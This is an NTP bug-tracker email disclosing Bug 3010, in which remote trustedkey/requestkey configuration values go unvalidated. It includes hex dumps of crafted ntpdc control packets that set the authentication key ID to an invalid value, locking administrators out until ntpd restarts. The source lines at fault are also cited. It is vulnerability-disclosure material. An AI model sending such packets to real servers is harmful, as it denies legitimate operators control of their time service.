[ntp:security] [Bug 3010] remote configuration trustedkey/requestkey values are not properly validated

bugzilla-daemon at ntp.org bugzilla-daemon at ntp.org
Wed Feb 3 07:33:38 UTC 2016


http://bugs.ntp.org/show_bug.cgi?id=3010

Harlan Stenn <stenn at ntp.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
              Group|                            |Security
                 CC|                            |LRlian at 163.com
            Summary|x                           |remote configuration
                   |                            |trustedkey/requestkey
                   |                            |values are not properly
                   |                            |validated
              Flags|                            |blocking4.2.8+

--- Comment #1 from Harlan Stenn <stenn at ntp.org> 2016-02-03 07:33:38 UTC ---
Command “ntpdc -c trustedkey AAAA” can’t be used now, but I can use these
packets to simulate it.

Set_control_keyid:                                                 //command is
: ntpdc –c trustedkey …
17 80 03 21 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 86 11 09 1E B8 52
00 00 00 08 71 AA 5D 1B 92 C6 C9 D8 CB 76 5D CB
F8 D2 87 D9 (These red bits are wrong MD5 of other bits , in order to decrypt
succeed ,you need calculate it yourself.)

Set_request_keyid:                                                // command is
: ntpdc –c requestkey ….
17 80 03 20 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 62 43 5D 1E B8 52
00 00 00 08 FB D2 B8 32 EF 89 37 21 73 F2 20 B4
94 82 95 59

After I sent these packets , the global variable info_auth_keyid or
ctl_auth_keyid will be assigned “41 41 41 41” :

Ntp_request.c:

2268:  info_auth_keyid = ntohl(*pkeyid);
…
2296:  ctl_auth_keyid = ntohl(*pkeyid);

·         Because key “41 41 41 41” isn’t a valid key and not exist in ntp.keys
, all the trusted ntpd administrators couldn’t use all of the ntpdc and ntpq
commands which need authentication ,even though they have the real key and
password , until the ntpd.service be restarted.

Here is the details:

authentication function :

Ntp_control.c:
Line_1158: !res_authokay || res_keyid != ctl_auth_keyid
Authkeys.c:
Line_690:  if (0 == keyno || !authhavekey(keyno) || size < 4)
                     …
Ntp_request.c:
Line 586:  ntohl(tailinpkt->keyid) != info_auth_keyid

·         Here is the test screenshot:

Before I sent attack packet, I addpeer through ntpq commands sucess.
But I addpeer failed , after I sent the attack packet.

[cid:image003.jpg at 01D14C66.562D2770]

And it’s same to ntpdc commands.

[cid:image004.png at 01D14C63.5CD17840]

And perhaps this problem is not serious because of the password protector. But
it’s a security issue after all .

-- 
Configure bugmail: http://bugs.ntp.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.


More information about the security mailing list